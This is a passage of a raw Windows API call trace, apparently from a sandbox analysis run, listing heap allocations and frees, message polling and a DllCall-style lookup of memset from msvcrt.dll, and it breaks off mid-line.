[0179.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0179.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0179.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0179.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0179.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0179.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0179.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0179.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0179.910] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0179.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0179.910] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0179.910] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0179.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0179.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0179.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0179.910] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0179.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0179.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0179.911] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0179.911] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0179.911] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0179.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0179.911] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c27f8 [0179.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c27f8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0179.911] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0179.911] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0179.911] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0179.911] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0179.911] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0179.911] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0179.911] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0179.911] FreeLibrary (hLibModule=0x75c90000) returned 1 [0179.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0179.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0179.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0179.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0179.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0179.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0179.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0179.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0179.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0179.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0179.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0179.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0179.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0179.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0179.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0179.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0179.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0179.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0179.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0179.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0179.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0179.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0179.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0179.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0179.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0179.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0179.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0179.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.913] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0179.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0179.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0179.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0179.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.913] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0179.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0179.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0179.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0179.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0179.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0179.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0179.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0179.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0179.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0179.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0179.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0179.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0179.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0179.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0179.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0179.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0179.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0179.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0179.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0179.914] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0179.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0179.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0179.914] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0179.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0179.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0179.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0179.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b60 [0179.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0179.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0179.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0179.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0179.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0179.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ac0 [0179.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0179.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0179.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0179.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1890 [0179.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0179.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0179.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4b0 [0179.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0179.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0179.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0179.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0179.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0179.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0179.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0179.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0179.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0179.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0179.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0179.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0179.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0179.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0179.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0179.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0179.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0179.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0179.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0179.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0179.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0179.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0179.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0179.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0179.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0179.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0179.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0179.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0179.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0179.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0179.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0179.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0179.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0179.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0179.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0179.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0179.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0179.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0179.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0179.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0179.917] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0179.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0179.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0179.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0179.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0179.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0179.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0179.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0179.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0179.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0179.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0179.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0179.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0179.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0179.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0179.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0179.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0179.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0179.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0179.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0179.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0179.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0179.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0179.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0179.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0179.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0179.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0179.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0179.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0179.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0179.918] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0179.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0179.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0179.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0179.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0179.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0179.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0179.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0179.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0179.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0179.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0179.919] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0179.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0179.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0179.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0179.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0179.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0179.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0179.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0179.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0179.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0179.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0179.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0179.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd948 [0179.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0179.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0c0 [0179.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0f0 [0179.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba168 [0179.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd918 [0179.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0179.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd858 [0179.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9a60 [0179.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0179.920] RtlAllocateHeap 